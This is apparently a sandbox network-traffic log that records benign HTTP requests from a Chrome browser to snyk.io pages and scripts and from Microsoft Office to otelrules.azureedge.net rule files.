Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/contact-us.json?slug=contact-us HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/careers.json?slug=careers HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/news/snyks-ai-native-sast-product-passes-100m-in-arr.json?slug=snyks-ai-native-sast-product-passes-100m-in-arr HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/schedule-a-demo.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0x-middleware-prefetch: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-ambassadors.json?slug=snyk-ambassadors HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"ma1xfma3ui1bez"
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/podcasts/the-secure-developer.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/security-leaders.json?slug=security-leaders HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog/snyk-snowflake-data-share.json?slug=snyk-snowflake-data-share HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"161n0ij5epvz3r"
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-top-10.json?slug=snyk-top-10 HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/events.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-ambassadors.json?slug=snyk-ambassadors HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/schedule-a-demo.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"426rz30xfxidf"
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog/snyk-snowflake-data-share.json?slug=snyk-snowflake-data-share HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/services.json?slug=services HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/about.json?slug=about HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customers.json?slug=customers HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/schedule-a-demo.json HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"purpose: prefetchx-nextjs-data: 1sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"426rz30xfxidf"
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/partners.json?slug=partners HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/case-studies.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /browser-ui/latest/bundle.js HTTP/1.1Host: app.usercentrics.euConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/news.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1686142464%2Fillustration-ui-spot-snyk-deepcode-hybrid-accuracy.png&w=960&q=75 HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_vercel/speed-insights/script.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_vercel/insights/script.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/contact-us.json?slug=contact-us HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/schedule-a-demo.json HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/news/snyks-ai-native-sast-product-passes-100m-in-arr.json?slug=snyks-ai-native-sast-product-passes-100m-in-arr HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/snyk-ambassadors.json?slug=snyk-ambassadors HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"ma1xfma3ui1bez"
Source: global trafficHTTP traffic detected: GET /schedule-a-demo/ HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5B...slug%5D-06f8921baae0411a.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/2135-5b964b3926facfba.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1520-731cc441673764fe.js HTTP/1.1Host: snyk.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/careers.json?slug=careers HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/blog/snyk-snowflake-data-share.json?slug=snyk-snowflake-data-share HTTP/1.1Host: snyk.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: user_utm={}If-None-Match: W/"161n0ij5epvz3r"
Source: global trafficHTTP traffic detected: GET /browser-ui/latest/bundle.js HTTP/1.1Host: app.usercentrics.euConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
